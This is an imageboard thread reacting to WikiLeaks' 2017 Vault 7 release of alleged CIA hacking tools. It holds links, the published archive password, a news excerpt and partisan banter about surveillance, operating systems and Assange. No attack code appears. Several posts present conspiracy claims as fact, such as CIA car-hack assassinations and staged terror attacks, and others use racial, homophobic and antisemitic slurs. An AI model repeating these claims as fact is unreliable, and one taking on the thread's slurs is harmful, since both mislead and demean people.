[Wikileaks] Vault 7

twitter.com/wikileaks/status/838910359994056704

You think this will be something groundbreaking or fucking nothing?

Other urls found in this thread:

twitter.com/wikileaks/status/839100031256920064
wikileaks.org/ciav7p1/
pastebin.com/xRbruV9J
usatoday.com/story/money/2016/03/14/aubrey-mcclendon-crash-update/81772780/
reddit.com/r/WikiLeaks/comments/5y07s5/release_cia_vault_7_year_zero_decryption/
wikileaks.org/ciav7p1/cms/page_13205587.html
twitter.com/RoguePOTUSStaff/status/837788404624539652
twitter.com/RoguePOTUSStaff/status/837787980785991684
twitter.com/KimDotcom/status/839133534346330112
twitter.com/KimDotcom/status/839135413918785537
archive.is/KR5M3
mirror.co.uk/news/world-news/year-zero-series-wikileaks-cia-9981832
bbc.co.uk/blogs/adamcurtis/entries/d3921cac-2144-306a-9f6e-712c0c685010
zerohedge.com/news/2017-03-07/wikileaks-hold-press-conference-vault-7-release-8am-eastern
wikileaks.org/ciav7p1/cms/page_11629155.html
reddit.com/r/politics/comments/5y0umd/wikileaks_publish_1000s_of_what_they_say_are_cia/
reddit.com/r/politics/comments/5y0bdr/wikileaks_releases_new_information_regarding_the/
reddit.com/r/politics/comments/5y0oud/wikileaks_releases_vault_7_reveals_the_cias/
reddit.com/r/politics/comments/5y1098/wikileaks_publish_1000s_of_what_they_say_are_cia/
reddit.com/r/politics/comments/5y11hp/wikileaks_claims_to_release_thousands_of_cia/
reddit.com/r/politics/comments/5y17yk/wikileaks_releases_massive_cia_hacking_document/
reddit.com/user/imhighpitch
reddit.com/user/TinyBaron
reddit.com/user/TheNormalWoman
wikileaks.org/ciav7p1/cms/page_17760284.html
twitter.com/Snowden/status/839155787226316800
twitter.com/wikileaks/status/839168891448410112
ponychan.net/rp/res/41215539 50.html#41484893
wikileaks.org/ciav7p1/cms/page_36896783.html
wikileaks.org/ciav7p1/cms/page_27262984.html
wikileaks.org/ciav7p1/cms/page_11628873.html
wikileaks.org/ciav7p1/cms/page_3375231.html
reddit.com/r/WikiLeaks/
rt.com/viral/379769-snowden-responds-wikileaks-dump/
rt.com/news/379757-your-whole-life-is-hacked/
en.wikipedia.org/wiki/Michael_Hastings_(journalist)
en.wikipedia.org/wiki/Malaysia_Airlines_Flight_370
archive.org/details/CIAWIKILEAKSVAULT7
twitter.com/wikileaks/status/839231634410983424
wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf
wikileaks.org/ciav7p1/cms/files/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf
wikileaks.org/ciav7p1/cms/page_13763164.html
twitter.com/wikileaks/status/839154582970335232
wikileaks.org/ciav7p1/cms/page_16385276.html
without-systemd.org/wiki/index.php/Arguments_against_systemd
systemd-free.org/
lainchan.org/sec/res/4091.html#4637
qubes-os.org/doc/windows-appvms/
qubes-os.org/
wikileaks.org/ciav7p1/cms/page_11629096.html
wikileaks.org/ciav7p1/cms/files/UsersGuide.pdf
youtube.com/watch?v=QQcrSPiNnNg
drive.google.com/file/d/0BxRMPlDydM_kXzA5Nl9pRDZ6XzA/view?usp=sharing
archive.org/details/CIAWIKILEAKSVAULT7IMAGEFILES
archive.org/details/VAULT7CIAHACKINGTOOLSDOCUMENTS
twitter.com/wikileaks/status/839475557721116672
globalresearch.ca/pablo-escobars-son-reveals-his-dad-worked-for-the-cia-selling-cocaine-media-silent/5576222
twitter.com/SFWRedditVideos

By torrenting the feds will see every single IP.

We are all on multiple watchlists already, showing wrongthink on the internet leads to that easily.

Doesn't really matter much to me since I'm a at least 4th generation commie

Fallout 5 confirmed.

Stream link?

Decryption is released
password is:
SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds

Source: twitter.com/wikileaks/status/839100031256920064

Vault 7: CIA Hacking Tools Revealed
wikileaks.org/ciav7p1/

It begins

(checked)
I want the CIA to be Abolished and replaced with something a little less insidious

…he's going fucking nuclear

Is Assange still alive?

wew

EVEN THE CIA PIRATES WINDOWS HAHAH

God i Hope so
We cant afford to lose Geralt of Australia

Lets hope this blows up

Thats nothing really new tbh, manipulating cars of politicians that love to drive fast is so obvious that it has happend a few times atleast.

What the fuck?

Nothing to see here.

OFFICIAL CIA EMOJI LIST

pastebin.com/xRbruV9J

I can't believe kaomoji are compromised too…

More proof that software being open source doesn't make it automatically safe.
(Not arguing against open source, though.)

VLC is also compromised.

If Im not on a list already, they arent doing their job.

Kim Dotcom (@KimDotcom) is breaking some of it down on his twitter

Skype voice conversations are converted into text in real-time, scanned for contents of interest and stored in CIA spy cloud.

BREAKING: CIA turned every Microsoft Windows PC in the world into spyware. Can activate backdoors on demand, including via Windows update.

WHY WONT DEVELOPERS MAKE GAMES FOR LINUX SO I CAN DUMP THIS BOTNET OF AN OS

Just a GNU SLASH REMINDER that using wangblows it's pretty much asking to take a huge dong in the butt.

That's fucking insane.

Someone post the image that shows that they get "Ideas" from reddit

Do you guys even have the slightest understanding how this malware works?

Running notepad, thunderbird or any other of the listed services doesn't mean your computer or network is compromised

State agencies using automated updates to infect devices and computers has been known for decades

GNU/Linux can also be infected by malware, I don't see the point here

wow i guess that makes it as bad as windows .. fuck ……

Fuck off CIA.

cia btfo forever

I only use free/open source software myself because I don't like the telemetry in Windows 10

It doesn't change the fact that Linux is obviously affected by 0 days and other security problems that make it possible to be inficted

Yeah I'm sure all GNU/Linux distros are compromised.

Meanwhile Windows itself is compromised. Just as bad, right?

0 days get fixed.
Meanwhile microsoft, apple and other porkies deliberately cooperate with the CIA.

I'm not saying that Linux is as bad as Windows yet I don't want to give people a false sense of security or privacy by simply running Linux

usatoday.com/story/money/2016/03/14/aubrey-mcclendon-crash-update/81772780/

Surprised Steam isn't affected

so far.

Origin's safe too thank god.

We're living in the worst and most boring cyberpunk timeline.

Signal might not even be safe if your phone is already compromised

You're talking about this? It's not that Signal isn't safe, it's Android/iOS itself. With a keylogger you can get around any encryption.

This is true for anything. Root is king.

Am I the only one who's not surprised at all by these revelations? As Zizek says Wikileaks main function usually is that we have to stop pretending that we don't already know how we are ruled.

Yeah that's what I meant. I just realized I worded that weirdly.

Well duh.

There's only a few things I'm surprised at, mainly some open source programs being compromised, but most of it was expected/already known.

Always good to have actual evidence though, so you can rub it in people's faces.

gabe is not a significant porky whatsoever. He has like what: 100 workers?

They shouldnt get such a feeling by just using linux on its own, without any further steps taken to protect themselves. But linux or BSD is a prerequisite to even having a chance to protect yourself, you've already lost if you're running windows or macOS(but it DOESNT HAVE TO BE LIKE THIS INSTALL GENTOO)
anyways, install a linux distro and follow the apropriate guides to secure it('security' on archwiki, say), use tor/i2p for all internet wherever possible, run firefox with privacy/security addons, cut botnet chat shit and software as a service substitute out of your life strictly and without hesitation wherever its possible to do so.

We need more leftists tweeting about this on Twitter! The hashtag is full of Trump supporters and I can see a lot of neolibs and normies writing this off because of it.

Even this thread isn't getting much attention.

they deserve it.

[–]Gear4Life [score hidden] 15 minutes ago
The_donald actually have a pretty active stickied megathread going so far. It seems like it's leaked CIA eDocs. Confirms they can remotely take over your cars computer and kill you, just about any device with a microphone and camera is hackable. Something about Smart TV's being constant surveillance devices, and that there's an American Consulate somewhere in Europe that's actually a CIA hacking "center" I guess you'd call it.
That's what I've seen but it's only been an hour. I'm gonna have some breakfast and let the autistics do the work.
permalinkembedsaveparentreportgive goldREPLY

reddit.com/r/WikiLeaks/comments/5y07s5/release_cia_vault_7_year_zero_decryption/

tbh user a lot of the people here have likely gone to the Holla Forums
Its not like this is particularly politics related either way and we pretty much share the same curiosity with Holla Forums in this case

CIA is more advanced than the fucking NSA

Are ya havin a fukkin laff mate?

Because obviously the key part of spying on everyone is letting as many random members of staff at your backdoor vector companies know you're doing it as possible.

THE TELEVISIONS ARE SPIES!

In America, the TV watches you.

The list of iOS exploits they've hoarded:
wikileaks.org/ciav7p1/cms/page_13205587.html

Most of them even mention how they were later publicly discovered by China.
CIA could have easily told Apple and got them fixed, but 'muh terrorists' is obviously more important than American safety.

Havent owned a tv in 10 years, my last tv was a tube one.

omg 1984 is real

This maybe the porky in me talking but this opens up the market to "safe" devices.

This won't even be all of it. Anything with any potential to transfer data with a speaker or microphone should be regarded as bugged.
Going full tinfoil, data could be bounced around a house using speaker systems to a data transfer point.

Im pretty sure Julian is going to die soon

1. run gentoo
2. don't install X
3. browse with lynx or w3m, watch videos with framebuffer
4. put on tinfoil hat

so what did we learn. as long as you dont have a smart tv or smart car you should be good? lol this is some scary shit though

I wonder how many of these spook men use these powers to spy on their wives, and or get celebrity fap photos

Or Windows, OSX, iOS, Android, shitty Linux distros like Ubuntu…

NSA is mostly data collection and analysis, big data. CIA is intelligence, getting the data, ensuring staying one step before the rest.

So is there any proof of collaboration with companies or is this just the CIA compromising products on its own?

I want off this train guys :(

that is fucking terrifying. can't even have cam sex with my waifu in privacy

i've seen the screen shots you guys have discuss so far. they just look like windows applications with backdoors. where does it say the other operating systems are comromised?

Don't companies like Apple leave backdoors intentionally?

Windows has been compromised since Windows 2000 lmfao

Spending billions of tax dollars to spy on your wife would actually be something very human.

Both: Microsoft, Apple, Sony, etc. have mutual agreements with the CIA; the "little guys" like vlc, firefox, etc. are compromised as the lists suggests.

Reminder

Quote is from 1999

Yes, yes they do.

Probably since earlier.

Everything with audio input/output and wireless capabilities is bugged. Periodically plugging a device into a network also counts.

I was under the impression they don't. Especially after the FBI tried to bully them into unlocking that iPhone in the San Bernardino case and they stood their ground.

basically if its electronic they can hack it, an also they know everything about you, and can watch you through the tv, also assassinate you by controlling your car, good night.

The world is fucking horrible.

He could've prevented this.

A big bunch of over-hyped nothingness like it nearly always is.

And that's called PR. Apple always liked to appear as the rebel, the unique one. I wouldn't be surprised that that specific case was made public because the FBI demanded too much.

Nah. The rulers are.

Listen to this man.

forgot my flag

twitter.com/RoguePOTUSStaff/status/837788404624539652
twitter.com/RoguePOTUSStaff/status/837787980785991684

Does this spell the end for the Russian agent arc?

No. Fuck you.

Smells like great man theory to me.

"The Rulers" isn't a single man. It's a class of people.

the only way to fight against this is to use an old car and tv, and have no shame at what you fap to

they were playing 4D chess all along.

I just want to move to Iceland now :/

why didnt they do this earlier? It was the obvious solution.

Now that's what I call a cost-efficient business model!

If you want a thing done well, do it yourself.

Already there.

Is this the thing they were going to leak if Assange died, or what?

I thought that was the 9/11 thing.

dont derail the thread you shill mong

The CIA also has controlled the Washington post since they took down nixon.
They have their fingers in a lot of pies

Twitter is preventing any of this shit from trending, twitter trends have been compromised for a while to promote the neolib line

We get the worst parts of a cyberpunk dystopia and none of the good things.

WEW LAD

get bent

I can't believe they beat us to exploding vans!

Again, every single speaker can be used as a microphone.

D:

1. CIA can bypass Signal encryption
2. CIA can spy on you through your smart TV
3. CIA more advanced than NSA

was probably M-15's idea

THERE IS NO ESCAPE FROM THIS WORSE GANGSTER POLICE STATE

USING ALL OF THE DEADLY GANGSTER FRANKENSTEIN CONTROLS

It's been a long postponed aspiration of mine to write a story where the nightmares of the modern world are shown with enough cyberpunk aesthetic to make the (utterly hopeless) medicine go down.

But all my ideas wind up too autistic, disjointed, or "You know, most of the background characters seem pretty happy - maybe the protagonist really is crazy." so on the drawing board it stays.

CIA = Microsoft
CIA = Apple
CIA = Cisco
CIA = All major US tech companies

Why don't you just watch Black Mirror?

what am I looking at here?

Where's Weyland Yutani?

Internal IP addresses and that CIA is full of fucking nerds.

holy shit CIA plays Portal. kek

I've been meaning to, actually.

But creating things is fun. the previous statement was a lie. having created things is fun.

Except that now they actually did it.

Portal
HalfLife
Deus Ex
Resident evil

WikiLeaks‏Verified account @wikileaks 2h2 hours ago
More
#CIA hid ability to #hack smart phones and TVs worldwide from makers, despite #Obama pledge to reveal

Looks like the dopey tech companies werent in on it

The irony.

Start with Shut Up and Dance.

THE STOCKS! WHAT ABOUT MY STOCKS

t. silocon valley

twitter.com/KimDotcom/status/839133534346330112

Use VNP, then once downloaded, unplug the internet connection, transfer the file onto an air-gapped (OFFLINE) computer, get rid of the file on your other computer you used to download it, clear it from your torrent client too.

Why is this fat fuck @ing Trump in all of his tweets lol

desperate fatso

Dunno, but he just keeps desperately sucking Trump's dick.
twitter.com/KimDotcom/status/839135413918785537

Worst part is that you also need to be careful with what hardware you use, not just software.

The deep state sees themselves as the real government, no one elects them, they are always there, the politicians are their puppets who they control with the info they have.
Trump winning obviously has thrown a wrench into their system

Not really, Trump is just a player for another faction of the governmental and corporate interests people call the deep state
The "deep state" isn't monolithic, there's numerous groups and interests running through it

In the context of the thread, Trump has always advocated for spying on US citizens and even said Snowden is a "traitor", so lol

Looks like twitter knows where the real news is

Currying favor given his recent extradition loss; he'll pressure to get the ruling reversed outside the courts.

My question is, if they can do all that? Why haven't they put it to use to stop terror attacks, or school shootings. The fact that they can stop stuff but won't scares me.
(That, or wikileaks and snowden are full of shit and making up false stories on how reality and tech works)

QUESTION: What are the chances Trump acknowledges this? Best case scenario Breitbart blows this up, gets Trump attention, aaaaaaand……?

If you are technologically illiterate you should just shut the fuck up.

At times like these I wish Stallman had a twitter or something where he posted on real time.

surprise! It doesn't work most of the time but it's okay because the only collateral damage is your privacy :)

Also TERRORIST ONLY HAVE TO GET IT RIGHT ONCE. These guys and the NSA have created a facade that they have everything under control when they really don't. It's futile.

I bet you 20 chicken tendies that Trump won't reform the CIA, but continue their founds, most likely even increasing it, or creating another institution (like Bush with the NSA).

Yup, it happens every fucking time. See: the war on drugs

Why would they?
A successful terror attack can be used to justify budget increases or to make political gains
It wouldn't surprise me if they actually organized and planned out attacks

This was a foregone conclusion when Trump accepted the resignation for his NSA pick like an amateur. He folded so quickly I forget the name.

You want to know how the FBI and CIA operate?
They infiltrate a subversive group, tell them "hello, my fellow biker gang, white nationalist, communists, kkk, black panther, Muslim, boy, i sure do hate the gubmint, maybe we should make some stuff explode"

then when the group agrees, they set them up to get arrested.

And besides, terrorism benefits them, it justifies their jobs and gives them an excuse to raise their budget

kek this

Where the fuck is my A E S T H E T I C

They either killed JFK or let him get killed.

Considering he never cared about government's intrusions and always disliked Manning, Snowden and Assange for being "traitors" (and only started liking Wikileaks when they started publishing Clinton's emails), it wouldn't be a surprise.

You're trapped in McDystopia and there is no escape!

This is true and not just in the US.

I mean realistically, how would you even destroy the deep state?
You would have to upend the entirety of society it has its tentacles in and reveal to the drooling masses that their entire life is a lie

holy shit

those cheeky cunts

I wonder if the irony isn't lost on them

Flynn

I personally suspect they knew and possibly aided in the 9/11 attacks, and that Flight 93 was shot down

"Trending" topics are controlled by twitter. This could light up the boards and still not even get a mention.

The pic reminds me of SMT:Nocturne

lul

It's amazing how less some of you guys understand yet still discuss this all day long.

1. the CIA can bypass Signal encryption by owning the endpoint device. This means that the operating system is insecure. The text itself is still protected while it's "on the wire".

Ask yourself: How high is the chance that the CIA infects my smartphone?
This is a huge difference between the NSA who mostly just grabs all traffic off the internet and analyzes it.

2. Smart TV's (and internet of things devices in general) are always horrible for your privacy since most of them send back data about your behaviour in home even without being owned. (Given the fact that they often run old Android or even worse operating systems owning them isn't that hard for a state agency)

3. I'm not sure you can compare their spying abilites since the CIA works completly differently than the NSA

this literally does nothing and is bad infosec advice

It's still trending in Germany

You're overblowing the CIA program, the average person is more under attack by the NSA

Get off your high horse.

If you really gotta use Windows, the built-in Defender is all you need.

Yessssss don't talk about the shady things the government does.

It's not a particularly high horse when the pondering is about whether your hardware being compromised affects software.

Bah! Where would they hide the code?

Decided to check Lainchan to see if they were talking about it and jesus christ, that place is fucking dead now.

WikiLeaks has claimed the CIA targeted iPhones and Microsoft Windows and worked with MI5 to turn Samsung TVs into microphones as part of a global hacking programme.

The secretive organisation is about to release a huge trove of confidential documents from the U.S. Central Intelligence Agency as part of its mysterious Year Zero series, founder Julian Assange claimed.

It has issued the release amid claims the CIA has been carrying out a global covert hacking program that exploits US and European company products.

It claims these include Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which it says "are turned into covert microphones."

In an online statement on its website, Wikileaks also claims the attack against Samsung smart TVs was developed in cooperation with the UK's domestic intelligence agency MI5/BTSS.

It states: "After infestation, Weeping Angel places the target TV in a 'Fake-Off' mode, so that the owner falsely believes the TV is off when it is on.

"In 'Fake-Off' mode the TV operates as a bug, recording conversations in the room and sending them over the internet to a covert CIA server."

Mr Assange said: "There is an extreme proliferation risk in the development of cyber 'weapons'.

"Comparisons can be drawn between the uncontrolled proliferation of such 'weapons', which results from the inability to contain them combined with their high market value, and the global arms trade.

"But the significance of "Year Zero" goes well beyond the choice between cyberwar and cyberpeace.

"The disclosure is also exceptional from a political, legal and forensic perspective."

The hacking group said the publication release is from 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence.

Wikileaks said: "Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation.

archive.is/KR5M3
mirror.co.uk/news/world-news/year-zero-series-wikileaks-cia-9981832

lul

Do what you can to spread this guys! Social media, friends, family. I really don't want this to go under the radar anymore.

Apple are the biggest shills in existence, worse than fucking Microsoft.

If you have nothing to hide you have nothing to fear.

Its shit like this why no one trusts the mainstream media anymore

They're still sore Wikileaks ruined Shillary's campaign.

der Spiegel is a reliable source which is reporting about it

the (((media)))is too cucked.

I should start a business making microphone and camera covers.

Wikileaks insider here, I've spent multiple days reading through all the documents and there is really nothing substantial.
Please feel free to waste your time though if you think you are somehow better than a professional data analyst such as myself.

larping as a retard is still retarded

FOXCONN already make millions of them, with GPS.

My favorite shitpost is "I just went throught it and it appears to be nothing substantial sadly."

Can confirm, it's nothing
please don't download it or read it

Fun story of how they fucked up Syria to begin with:
bbc.co.uk/blogs/adamcurtis/entries/d3921cac-2144-306a-9f6e-712c0c685010

Son, i think you and me need to take a walk

I'm really, really curious as to how the American police apparatus compares with the old Stasi. I mean Stasi had snitches everywhere, but the American police is so fucking immense that their agents already infiltrated everything and don't even need snitches to begin with.

Rt's report.

And they called us paranoid when we NOPEd because of the mandatory camera.

Very tired of shills shitposting about open source software when DLL hijacks can happen to anyone.

zerohedge.com/news/2017-03-07/wikileaks-hold-press-conference-vault-7-release-8am-eastern

based edward snowden jr, working the deep state marks

lel, maybe in my wine setup

RUSSIA, RUSSIA RUSSIA

I hope you didn't make that collage.

wikileaks.org/ciav7p1/cms/page_11629155.html

Dare I ask?

I know >reddit but if you go to r/politics and search controversial you'll find all the missing wikileaks posts

look at the comments and you'll see actual shills in the wild

Kojima was right again.

care to give us a few examples?

Does this actually surprise anyone? And why do the Trump people think that somehow their glorious leader won't continue this or will in any way protest it? Are the Trumpenproles really, REALLY that delusional?

I only have the most basic skill in programming and I can tell what an utter clusterfuck this is.

Also it's pretty obvious that Windows 10 is so laden with unintelligible crap it's compromised in several places. I need to use a better OS.

Do I need to say it?

There's one in every thread, isn't there?

I'm sorry for all the shitposts Donnie. Just this once PLEASE tweet about this. PLEASE make a big deal about this. DO SOMETHING.

Flynn's gone, it's over! We tried to warn you, it's too late!

The saddest part is this is probably the only thing they will be reprimanded for.

What the hell, there's several pages that should have enormous numbers of smileys, but only the Jap one has them. I feel cheated.

About the bit below, I'm guessing "implied perverse interpretation" is ( ° ʖ °) ?

Comments:

2015-05-29 11:26 [User #71475]:

(づ。◕‿‿◕。)づ gotchya covered

2015-05-29 09:58 [User #524297]:

oh thank you, you amazing human being.

i would like to put in a request for the reddit "implied perverse interpretation" face.

the 'undisapproval' face as shown here would be a nice addition as well.

Nice one boss!

Kek

reddit.com/r/politics/comments/5y0umd/wikileaks_publish_1000s_of_what_they_say_are_cia/

reddit.com/r/politics/comments/5y0bdr/wikileaks_releases_new_information_regarding_the/

reddit.com/r/politics/comments/5y0oud/wikileaks_releases_vault_7_reveals_the_cias/

reddit.com/r/politics/comments/5y1098/wikileaks_publish_1000s_of_what_they_say_are_cia/

reddit.com/r/politics/comments/5y11hp/wikileaks_claims_to_release_thousands_of_cia/

This one especially: reddit.com/r/politics/comments/5y11hp/wikileaks_claims_to_release_thousands_of_cia/

Several users make the exact same comments.

reddit.com/r/politics/comments/5y17yk/wikileaks_releases_massive_cia_hacking_document/

A TOTALLY REAL AND LEGITIMATE REDDIT USER ACCOUNT

NYT just had a news article. Give people time to write nigga

Totally "Not Russian" Attempt at Distraction, right?

I don't get the hate directed at Obama since it was Bush that kicked the surveillance thing to MAXIMUM OVERDRIVE

holy fuck they're not even trying

This case needs a special prosecutor. Sessions needs to resign. We need to make our voices heard.
This case needs a special prosecutor. Sessions needs to resign. We need to make our voices heard.

reddit.com/user/TinyBaron

I don't get the hate for person committing horrible act because other person committing horrible act did it first.

What a life!

What's a good way to archive these user profiles?

Archive.is and MSPaint?

he has to right guys? he was literally JUST complaining about spying

Tbh people should be hating the power structure instead of just the guy helming it

What are the odds that this is an attempt to discredit the CIA, by the CIA itself, so that when the CIA is ACTUALLY behind something, someone else takes the blame and the CIA gets off scot-free? These people have a history of pointing the finger at themselves.

I don't know, these days stuff like this just reeks of self-inflicted discrediting as a means of massive distraction. While we're all focused on this stuff, the bad guys go out and create 10 different new agencies for each 1 that's compromised. Guys I think we underestimate how deep the deep state really is.

I think you have to be really optimistic about the state of discourse and critical thinking in the US to decide that it's all shilling. I guess people forget that hillbots can be just as retarded as trumpens.

When the guy "helming it" has the means to stop the behavior, yet not only fails to stop it, but massively expands said behavior, he's deserving of the hate.

LOL

Yeah, the CIA totally wants to point out that the deep state is unrelenting and unimpeachable, and that the power bases presented to the public are largely just for show.

Yeah, that's the tricky part, trying to sift out suckers that have just bought the dummy and the actual shills, like

could just be a dipshit and his sockpuppet. Or it could be another CIA dummy account created with their shill software.

But is there any real difference? In any event they're still disseminating propaganda.

Pretty much, famalam. Now you're getting it.

Yeah I agree it makes little to no difference, which is why I think shill accusations are just pointless in a general setting. Even if you're right you don't help your case, and it's not like bots are intrinsically better at arguing than humans that you can't just disprove their claims either way.

The main problem is with scale, but with the distrust of mass media this will be less of a problem moving forward.

But the (US) population isn't hopeless and compliant. They're mistakenly brazen and confident in their discerning and their rebellious, "anti-establishment" spirit. They're largely more misguided and confused than they are resigned.

Anyway, I still contend that the idea that Obama could do anything to reverse the state aparatus even if he wanted to is misguided and overly simplistic.

reddit.com/user/TheNormalWoman

Highly suspicious timing with this. I care what the CIA is up to but we have bigger problems. Russia has infiltrated our government and is actively trying to destroy it. This release is intended to discredit our intelligence agencies just as the heat is being turned up on Trump. Don't buy in.
Highly suspicious timing with this. I care what the CIA is up to but we have bigger problems. Russia has infiltrated our government and is actively trying to destroy it. This release is intended to discredit our intelligence agencies just as the heat is being turned up on Trump. Don't buy in.

I want to die.

What did the cia mean by this?

twitter.com/Snowden/status/839155787226316800

I would imagine it's a list of ready-made emotes for posting/blending on forums. There are even explanations set to some of them.

Glenn Greenwald is always right.

Because you're a whiny bitch who has to have 100% of everything you want. There's more games on Linux than you could play in the next ten years, but if you have to have THIS SPECIFIC GAME, and are going to have Windows in order to play it, then they have no reason to port it, because bitches like you will keep using Windows till capitalism falls.

Savage

Jesus Christ. I don't know what's worse. This or Hillary's email server tech getting caught using reddit to ask how to delete names from an email server en masse

also literally nothing prevents someone from running Windows 10 in an isolated VM with 95% performance and exclusively using it for video games, except stupidity and/or laziness.

The fixed centralization of any kind of power is humanity's greatest downfall.

No thanks, CIA please browse my trap porn folder while I enjoy my 100% performance.

oh, wow

I like how the cia shills try to defend the cia, but then you bring up when they funded the taliban, or let Nicaraguan nuns get raped, or operation paper clip, or mk ultra, and they got nothing.

Nothing really surprising here. The CIA has backdoors in everything.

I got a good one: money.

One of the biggest redfalgs out there.
Seriously, my journey into leftism basically started from that video with Assange and Zizek, so Wikileaks will always have a special place in my heart.

CIA NIGGERS

Honestly Assange is quite possible a shitty dude, but the idea that you can only get useful information from pious saints is some liberal fantasy anyway.

The CIA has grown so powerful and omnipresent that I worry they'll never be able to fall.

Is this why there's never been any type of insurgency in America, because the CIA infiltrates and destroys it before it can ever get off the ground?

I wonder what their excuse going to be when the Russia will finally succumb yet again to the pro-western liberals.
Who is going to be the next big bad distraction, China maybe?

DLLs are Windows shared libraries btw

It's misdirected hate. Many people hate Wikileaks because of Assange, who's kind of a piece of shit if you ask me.

These threads reek of COINTELPRO. Many of the pro-CIA posters have accounts created from 2 months ago - hours ago today.

You mean the one with Horowitz?

Guys I think Leninhat may be onto something here.

Well, who knows what kind of person he is, he may not be a leftie as it is, but I still believe he has good intentions that are actually really beneficial for the left.

but why?

I believe that one, the one on RT if I remember correctly.

Hasn't the "rape" accusation been debunked anyway?

I think the big danger is what will happen once the government is no longer able to support the CIA. Suddenly you have thousands of "contractors" fleeing the CIA and any sort of public oversight for private "security firms" with thumb drives full of the computer equivalent of WMDs.
Partially, yeah. Things have been pretty decent all around for the past century or so, but careful manipulation of the media and subterfuge on the part of the alphabet soup agencies have disarmed quite a few vectors of political dissent.

I don't think he's talking about the rape accusation.

I don't doubt some of them are. These kinds of threads can be pretty useful for outing them if you're diligent about it.

Years ago.

Among many other things.

You guys misunderstand my intended message. I'm saying "possibly" exactly because it's immaterial to the content of wikileaks releases, and allowing liberals to frame the conversation to be about someone's morals is a distraction from the points being discussed.

People focusing so much on Assange are displaying a classic case of shooting the messenger.

I'm not very familiar with Assange's backstory.

I thought so, but there are still people trotting it out to smear Assange.

Nah, I get it

I love how Wikileaks unites both left and right.
There is something special about it that we should probably learn from.

ASSANGE THE WHITE, WIELDER OF THE LEAKS, I BESEECH THEE. THE ORCS ARE UPON US. LIGHT THE TORCHES AND COME TO THE AID OF MAN!!!

many times

twitter.com/wikileaks/status/839168891448410112
why is wikileaks shilling apple lmfao

There was this whole thing with Apple over the last year refusing to compromise security on its encryption software (more than they usually do) for the FBI.

Oh that makes them so much better than the government am I right

God Wikileaks always manages to piss me off with their tweets, always sucking Trump's dick and now Apple's

fucking nothing

Still nothing on CNN or MSNBC's website about this.

Because Russia planted plants in the wikileaks plants to plant the usa down because russia.

Yeah but it's on nyt, hill, guardian, etc so it's not exactly being kept from the mainstream

Flynn was a turkroach shill

I use alot of adobe programs for my job. Linux doesn't really have any comparable options.

duh. yes. The CIA was the principle organization responsible for destroying leftism in the cold war era. Both by actual assasinations and kidnappings and by propping up center left pro capitalist artists and thinkers so they would become seen as the left.

since when were the sexual assault allegations against him debunked? can anyone link me?

it's pretty suspicious when the dude apparently bragged about having 4 kids around the world.

Even if it is one, what's wrong with Wikileaks being a Russian front? It's proof of Assange's anti-imperialist credentials, imo

story like your picture are so fucking common in germany aswell lel
recently they had a situation where someone whos job it was to pose as someone who wants to help radicalise muslims get into some online groupchat, and he thought he found the klions den, everyone talking the most radical stuff, plotting out bombings etc.
him and his superiors try to find out the identitiys of the people and to no ones surprise everyone is actually a german secret agent.

it most famusly happens with Nazi groups where in the end they almsot exclusivly comprise of state funded Nazis who are paid to still be Nazis but give the government ntel and actual secret agents.

dat kaspersky feel

Get me off this ride plz

Centuries from now, when America as we know it is gone and replaced by entities we haven't imagined, CIA will still exist as an active conspiracy. Already powerful men coordinating efforts to help each other.

For one: no woman has actually accused him of rape and wants him arrested. The Swedish government did it of their own volition under highly unusual corcumstances. The situatio. that made it possible was that the woman was in temporary paranoid fear that she had contracted HIV (basically, you cannot know if you have HIV for more than a month after you think you may have contracted it, but are still infectious the whole time if you did catch it.) She imagined a situation where Assange poked a hole in his condom before having sex with her and attempted to have him forcibly tested. The Swedish government then told the woman they were going to instead pass her statements to a prosecutor and she was removed from the picture.

bump since the raid slid it

They're referring to the high-profile case of Apple refusing to provide a backdoor into their phones. The spooks wanted into the San Bernardino shooters phone iirc. That actually happened, whether you like it or not, the world isn't so black and white.

Are you saying not handing himself over to the U.S. DOJ is a result of a moral failing fat makes him a "shitty dude" lol

bump

One Dollar Man made a video about it.

No, but grandstanding like you would in the first place makes you a douche

What if it actually assisted in the freeing of manning? What if the Obama admin, done tortureing her for years on end, fully made its point, commuted her sentence as part of a gambit to descredit Assange through these imbecilic criticisms like you are making, and secure some appearance of magnanimity, and whitewash his administrations otherwise merciless assault on whistleblowers? The timing is definitely right, and its characteristic of obamas approach to politics.

Possible but highly doubtful imo. More likely Assange got wind of the coming sentence commute and took the opportunity to push for some publicity himself. We're not talking about any random dude here but a guy specifically known for having and disseminating government secrets.

What a moron, presenting the internet as something the free market made perverted by the state, while it is the other way around.

He has such a soothing voice

Right? Years of torture and abuse are wiped away I guess because the smiley black man let her off the hook. Nevermind that none of the crimes she exposed were punished. Obama!

friendly reminder to never ever buy a car with onstar (or similar), and to rip those things out if you have them

also m/t > a/t

He did the right thing and it was hilarious too.

What's hilarious is how he thinks that Trump isn't gonna do any of this. Somalia, Yemen, and especially Iran are clearly next.

Damaging evidence is coming on Trump sooner or later. Even Assange said that he wanted Trump's tax returns during the election.

Source on that? Chelsea's still in prison, so his promise hasn't triggered. Wouldn't be too surprised if he does reneg on the promise but this sounds like people are attacking him when the gov hasn't actually kept its part of the deal yet.

He's not going to and nobody who actually supports wikileaks wants him to, obviously. The idea that it's "the right thing for him to do… because he promised" falls apart when you scrutinize it all.

He put the reputation of Wikileaks on the line, and in particular their reputation with potential sources.

Much lower level lists than actual antifas and fascist radicals are. The idiots on Holla Forums who actuallly organize shit and the ones on here who try to recruit for protests are the ones who could never become senators or mayors. We're all on low level observation lists, as in we are kept track of when we move around the internet. Nothing serious, nothing to be paranoid about. Most alt-left and alt-right twitter anons are as well. None of us are going to end up arrested as long as we don't ferment tangible dissent.

what do you guys expect him to do? He's going to shit on the leakers because that's what the CIA wants him to do. He's clueless and will shovel them more money unless they do something stupid like blackmail him, which won't work because he has no shame

…so does this line of reasoning extend to Obama, Bush, Clinton, etc or is Trump uniquely free from responsibility while in office?

Yeah, this makes a whole lot of sense.

What I find funny is how Holla Forums think they beat the CIA by electing Trump, the irony.

